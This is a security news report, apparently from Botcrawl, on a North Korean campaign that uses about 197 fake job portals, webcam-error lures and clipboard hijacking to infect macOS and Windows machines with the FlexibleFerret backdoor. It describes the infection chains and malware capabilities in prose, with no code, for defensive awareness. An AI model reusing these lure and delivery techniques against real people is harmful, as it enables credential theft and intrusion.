North Korean Hackers Used 197 Fake Job Sites to Spread FlexibleFerret Malware

The North Korean hacking apparatus has escalated its recruitment based social engineering operations by deploying more than 197 fraudulent job portals designed to infect job seekers with FlexibleFerret malware. These fake hiring platforms impersonate high profile technology companies, lure applicants into staged interviews, and deliver multi stage loaders for macOS and Windows. The strategy represents one of the most mature people focused intrusion campaigns attributed to DPRK threat actors, blending social trust, UI sophistication, and technical precision to compromise individuals working in AI, cryptocurrency, and software development. Researchers at Validin, Jamf Threat Labs, and SentinelOne have tracked the rapid expansion of this infrastructure throughout 2025.

How the 197 Fake Job Platforms Work

The new infrastructure differs sharply from traditional phishing pages. Instead of low effort login screens or single page decoys, DPRK operators built fully functional career portals with detailed job listings, candidate dashboards, resume upload systems, route based navigation, and dynamic content. These platforms imitate the aesthetics and behavior of real applicant tracking systems used by major technology companies, including Next.js frameworks, animated UI elements, and polished landing pages designed to convert visitors into applicants. Many portals claim to be AI powered recruitment tools, echoing the marketing language of modern hiring platforms.

Visitors encounter realistic company logos, testimonials, feature comparison charts, and calls to action. The job listings impersonate organizations like Anthropic, Yuga Labs, Anchorage Digital, Digital Currency Group, NYDIG, Gate, and other firms that frequently appear in North Korea’s targeting patterns. The pages display dozens of fabricated openings covering AI research, crypto infrastructure, business development, engineering, and product management. Each listing includes descriptions, responsibilities, and seniority levels formatted to match legitimate postings.

The application process itself is carefully designed to appear authentic. Applicants must enter their name, email, location, LinkedIn URL, Github profile, current employer, and phone number. The portals also encourage users to upload resumes through a tool framed as “AI powered autofill”. While the autofill feature is non functional, the uploaded resumes provide DPRK with highly valuable intelligence. These documents reveal skill sets, employment history, technical capabilities, and personal contact information. Social profile links reveal network relationships and code repositories. Even if no malware is eventually executed, the operators still acquire a detailed dossier of every applicant.

The Staged Interview Trap

The core infection workflow begins only after the applicant reaches the interview stage. The platforms prompt candidates to record a short video introduction, a common practice in remote hiring. When users attempt to start the recording, the platform responds with a realistic looking error message claiming that the webcam or microphone is blocked by system permissions. It instructs the user to run a command in the terminal or PowerShell window to fix the issue. This step is a familiar part of legitimate interview workflows, making it an ideal point to hide the malware delivery chain.

DPRK operators avoid forcing victims to type or copy the malicious commands directly. Instead, the site uses a JavaScript clipboard hijacker. As soon as the applicant copies anything from the on screen instructions, the site replaces the clipboard contents with a multi part malware command. The victim believes they are pasting harmless troubleshooting instructions, but the clipboard contains a hidden payload that silently executes when pasted into a shell. This method takes advantage of natural user behavior and dramatically increases the likelihood of infection.

Windows Infection Chain

The Windows variant begins with a misleading command referencing what appears to be a driver update hosted on a Microsoft domain. The first stage prints a harmless echo output, allowing the user to believe the process is functional even though the update file never downloads. The real payload follows a moment later. A secondary command retrieves a ZIP archive from attacker controlled infrastructure. The archive is saved to the user’s temporary directory under a generic name designed to blend in with typical system artifacts.

PowerShell then extracts the archive into a subfolder and executes an embedded VBScript loader. The loader may register persistence, download additional payloads, or perform environment checks depending on the configuration. The VBScript component allows the malware to remain stealthy and leverage built in Windows utilities to avoid detection. This approach mirrors earlier DPRK operations that combine fake system tools with staged loader chains to bypass security controls.

macOS Infection Chain

The macOS pathway is more complex and technically refined. After the clipboard hijacking modifies the user’s command, the terminal downloads a script labeled macpatch.sh. The script determines the victim’s processor architecture, then fetches an appropriate ZIP archive containing arm64 or Intel specific components. Once downloaded, the script creates a working directory in the user’s temporary folder, extracts the archive, and launches a second stage loader.

The script also installs persistence by generating a LaunchAgent file in the user’s Library directory. This ensures that the malware will run on every system login. A decoy application named MediaPatcher.app launches simultaneously. The app displays a fake Chrome camera permission dialog, followed by a fake password prompt. The stolen password is then uploaded to a Dropbox API endpoint through valid HTTP calls. This deception increases the likelihood that victims will enter real credentials.

Inside the FlexibleFerret Loader

The final payload delivered in both macOS and Windows infections is a Go based backdoor known as FlexibleFerret. The backdoor stores a machine identifier inside the user’s temporary directory, performs duplicate instance checks, and registers itself using persistence mechanisms. It then contacts a hard coded command and control server located on attacker infrastructure. Once connected, it enters a persistent command loop that can retrieve instructions, exfiltrate information, or perform system level operations.

FlexibleFerret supports a broad range of capabilities. It can execute system commands, upload and download files, harvest Chrome browser data, extract saved credentials, capture system metadata, and search for targeted file types. It includes handlers for real time remote shell access, allowing live operator interaction. It supports directory enumeration, automated stealing routines, and extraction of Chrome extension metadata. The malware’s modular architecture suggests an evolving family of DPRK tooling that continues to receive updates tailored for cross platform operations.

Why North Korea Is Targeting AI and Crypto Professionals

The focus on AI and cryptocurrency industries is both strategic and long term. AI engineers commonly maintain access to model weights, research environments, training pipelines, and proprietary deployment infrastructure. Compromising those environments provides nation state adversaries with insight into technologies that impact national security, military research, and global economies. North Korea has a documented interest in applying artificial intelligence to defense development, autonomous systems, cyber operations, and sanctions evasion. These job lures offer a method for gaining access to research that is otherwise out of reach.

Crypto professionals operate in environments connected to high value assets. Their devices may store keys, credentials, or sensitive financial data. North Korea has long been involved in cryptocurrency theft to generate revenue. The flexibility of the FlexibleFerret malware allows attackers to target financial accounts and exfiltrate information related to digital wallets. Posing as major Web3 and blockchain companies increases the chances of engaging individuals who have privileged access to valuable systems.

The remote hiring culture in these industries further supports the effectiveness of DPRK’s approach. Many companies rely on asynchronous interviews, video submissions, and take home assessments. Instructions that require terminal commands do not immediately appear suspicious. This gives DPRK operators greater freedom to embed multi stage loader chains inside familiar workflows without triggering alarm.

Infrastructure and Attribution

The fraudulent job portals use domain names that resemble modern SaaS platforms. Researchers have tracked domains such as lenvny.com, advisorflux.com, assureeval.com, carrerlilla.com, evaluza.com, and proficiencycert.com. These domains use polished UI frameworks, short lived hosting patterns, and rapid turnover. The operators create, deploy, and abandon portals quickly to stay ahead of detection.

The clipboard hijacking behavior, fake job listings, interview based malware delivery, and command and control infrastructure match historical DPRK tactics documented in past Contagious Interview operations. SentinelOne previously linked these techniques to DPRK groups associated with malware families such as BeaverTail and earlier versions of OtterCookie. Jamf Threat Labs identified multi stage macOS backdoors that share code with FlexibleFerret. Validin documented the design, structure, and routing logic of the attacker’s Next.js job platforms, connecting them to wider DPRK tradecraft.

Broader Cyberwarfare Implications

This campaign represents a wider shift in state aligned cyber operations. Instead of breaching enterprise networks directly, DPRK is now focusing on individual professionals who hold the keys to sensitive environments. This approach mirrors traditional human intelligence recruitment in which adversaries target people rather than systems. By compromising an engineer’s personal workstation, attackers gain access to codebases, project notes, cloud credentials, CI pipelines, and confidential communications. The threat does not begin with the employer. It begins with the job seeker.

The use of nearly two hundred realistic hiring platforms demonstrates a high degree of operational investment. The risk now extends beyond companies into the broader technology workforce. Applicants who believe they are applying for jobs at respected AI and crypto organizations could unwittingly provide access to materials that have national level implications. The volume and quality of the portals also suggests that DPRK is scaling its operations to target thousands of professionals globally.

How Individuals Can Protect Themselves

• Verify that any job application originates from the official domain of the company.
• Be cautious of off domain recruitment sites that host assessments or interview tasks.
• Never paste commands from a website directly into a terminal or PowerShell window.
• Review any scripts or instructions inside a safe virtual environment before executing.
• Be suspicious of interview tasks that require installing updates or running troubleshooting commands.
• Change passwords and review recent account activity if you engaged with a suspicious site.
• Use reputable security tools to check for suspicious processes or persistence mechanisms.

Why This Campaign Is Hard to Detect

The strength of this campaign lies in its realism. Every part of the workflow mirrors modern remote hiring systems. The platforms look credible, the job descriptions feel legitimate, and the interview steps match industry norms. By the time the malware delivery occurs, the victim has invested time, shared personal data, and built trust with the platform. The clipboard hijacking method hides execution behind a familiar action. This level of subtlety shows significant operational maturity.

The rapid proliferation of new portals and the presence of multiple malware variants make the operation difficult to track. The infrastructure shifts quickly. URLs appear and disappear. Pages are redesigned. Job listings change. The flexibility of Go based loaders allows developers to update functionality rapidly. For defenders, the distributed nature of the campaign means that there is no single choke point or signature that guarantees detection.

Ongoing Outlook

FlexibleFerret continues to evolve, and the number of fake job platforms is likely to increase. Researchers monitoring recruitment based campaigns have identified repeated patterns in domain registration, site design, and backend routing logic that point to ongoing development. As the broader technology workforce becomes more global and remote, adversaries will continue exploiting hiring pipelines for access. To stay ahead of these threats, organizations must educate their applicants, monitor for suspicious off domain listings, and provide clear guidance on legitimate interview workflows.

Botcrawl will continue tracking these developments. For more in depth reporting on cyber incidents, readers can visit the data breaches section or explore broader threat coverage in the cybersecurity category.